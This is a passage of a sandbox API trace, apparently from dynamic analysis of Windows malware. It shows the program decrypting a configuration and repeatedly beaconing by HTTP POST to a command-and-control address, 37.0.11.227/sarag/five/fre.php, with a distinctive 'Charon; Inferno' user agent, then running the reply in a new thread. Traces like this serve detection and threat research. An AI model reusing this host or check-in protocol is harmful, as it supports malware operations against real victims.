hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0322.233] GetProcessHeap () returned 0x690000 [0322.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0322.233] GetProcessHeap () returned 0x690000 [0322.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0322.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0322.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.240] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0322.266] GetProcessHeap () returned 0x690000 [0322.267] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0322.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.268] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0322.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.269] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0322.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.270] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.270] GetProcessHeap () returned 0x690000 [0322.271] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0322.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.272] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0322.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.273] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0322.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.274] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0322.274] GetProcessHeap () returned 0x690000 [0322.274] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0322.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.275] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0322.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.276] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0322.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.277] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0322.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.278] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0322.278] GetProcessHeap () returned 0x690000 [0322.278] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0322.278] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0322.279] GetProcessHeap () returned 0x690000 [0322.279] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0322.279] socket (af=2, type=1, protocol=6) returned 0xb14 [0322.279] connect (s=0xb14, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0322.305] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0322.305] GetProcessHeap () returned 0x690000 [0322.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0322.305] GetProcessHeap () returned 0x690000 [0322.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0322.305] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0322.306] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0322.306] GetProcessHeap () returned 0x690000 [0322.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0322.306] GetProcessHeap () returned 0x690000 [0322.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0322.307] GetProcessHeap () returned 0x690000 [0322.307] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0322.307] GetProcessHeap () returned 0x690000 [0322.307] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0322.307] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0322.308] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0322.308] GetProcessHeap () returned 0x690000 [0322.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0322.308] GetProcessHeap () returned 0x690000 [0322.309] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0322.309] send (s=0xb14, buf=0x6ad508*, len=242, flags=0) returned 242 [0322.309] send (s=0xb14, buf=0x6aba40*, len=159, flags=0) returned 159 [0322.309] GetProcessHeap () returned 0x690000 [0322.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0322.309] recv (in: s=0xb14, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0322.385] GetProcessHeap () returned 0x690000 [0322.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0322.385] GetProcessHeap () returned 0x690000 [0322.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0322.386] GetProcessHeap () returned 0x690000 [0322.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0322.386] GetProcessHeap () returned 0x690000 [0322.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0322.386] closesocket (s=0xb14) returned 0 [0322.387] GetProcessHeap () returned 0x690000 [0322.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0322.387] GetProcessHeap () returned 0x690000 [0322.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0322.387] GetProcessHeap () returned 0x690000 [0322.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0322.387] GetProcessHeap () returned 0x690000 [0322.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0322.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1860) returned 0xb14 [0322.389] Sleep (dwMilliseconds=0xea60) [0322.390] GetProcessHeap () returned 0x690000 [0322.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0322.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.392] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0322.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.397] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0322.414] GetProcessHeap () returned 0x690000 [0322.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0322.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.416] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0322.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.417] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0322.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.418] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.418] GetProcessHeap () returned 0x690000 [0322.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0322.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.420] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0322.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.423] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0322.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.424] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0322.424] GetProcessHeap () returned 0x690000 [0322.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0322.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.425] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0322.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.426] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0322.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.427] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0322.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.430] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0322.430] GetProcessHeap () returned 0x690000 [0322.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0322.431] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0322.431] GetProcessHeap () returned 0x690000 [0322.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0322.431] GetProcessHeap () returned 0x690000 [0322.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0322.432] GetProcessHeap () returned 0x690000 [0322.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0322.432] GetProcessHeap () returned 0x690000 [0322.432] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0322.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.433] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0322.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.440] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0322.449] GetProcessHeap () returned 0x690000 [0322.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0322.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.450] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0322.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.451] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0322.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.461] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.461] GetProcessHeap () returned 0x690000 [0322.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0322.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.462] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0322.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.477] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0322.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.478] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0322.479] GetProcessHeap () returned 0x690000 [0322.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0322.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.482] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0322.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.487] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0322.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.488] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0322.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.489] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0322.489] GetProcessHeap () returned 0x690000 [0322.489] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0322.489] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0322.489] GetProcessHeap () returned 0x690000 [0322.489] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0322.489] socket (af=2, type=1, protocol=6) returned 0xb18 [0322.490] connect (s=0xb18, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0322.512] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0322.512] GetProcessHeap () returned 0x690000 [0322.512] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0322.513] GetProcessHeap () returned 0x690000 [0322.513] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0322.513] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0322.514] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0322.514] GetProcessHeap () returned 0x690000 [0322.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0322.514] GetProcessHeap () returned 0x690000 [0322.515] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0322.515] GetProcessHeap () returned 0x690000 [0322.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0322.515] GetProcessHeap () returned 0x690000 [0322.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0322.516] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0322.517] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0322.549] GetProcessHeap () returned 0x690000 [0322.549] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0322.549] GetProcessHeap () returned 0x690000 [0322.550] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0322.551] send (s=0xb18, buf=0x6ad508*, len=242, flags=0) returned 242 [0322.552] send (s=0xb18, buf=0x6aba40*, len=159, flags=0) returned 159 [0322.552] GetProcessHeap () returned 0x690000 [0322.552] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0322.552] recv (in: s=0xb18, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0322.626] GetProcessHeap () returned 0x690000 [0322.627] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0322.627] GetProcessHeap () returned 0x690000 [0322.627] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0322.628] GetProcessHeap () returned 0x690000 [0322.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0322.628] GetProcessHeap () returned 0x690000 [0322.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0322.628] closesocket (s=0xb18) returned 0 [0322.629] GetProcessHeap () returned 0x690000 [0322.629] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0322.629] GetProcessHeap () returned 0x690000 [0322.629] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0322.629] GetProcessHeap () returned 0x690000 [0322.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0322.630] GetProcessHeap () returned 0x690000 [0322.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0322.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1864) returned 0xb18 [0322.632] Sleep (dwMilliseconds=0xea60) [0322.634] GetProcessHeap () returned 0x690000 [0322.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0322.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.635] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0322.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.644] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0322.652] GetProcessHeap () returned 0x690000 [0322.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0322.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.653] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0322.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.654] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0322.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.655] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.655] GetProcessHeap () returned 0x690000 [0322.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0322.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.660] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0322.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.661] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0322.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.662] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0322.662] GetProcessHeap () returned 0x690000 [0322.662] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0322.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.663] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0322.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.664] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0322.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.665] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0322.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.665] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0322.666] GetProcessHeap () returned 0x690000 [0322.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0322.666] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0322.666] GetProcessHeap () returned 0x690000 [0322.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0322.667] GetProcessHeap () returned 0x690000 [0322.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0322.667] GetProcessHeap () returned 0x690000 [0322.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0322.667] GetProcessHeap () returned 0x690000 [0322.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0322.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.668] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0322.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.681] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0322.690] GetProcessHeap () returned 0x690000 [0322.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0322.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.691] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0322.694] LoadLibraryW 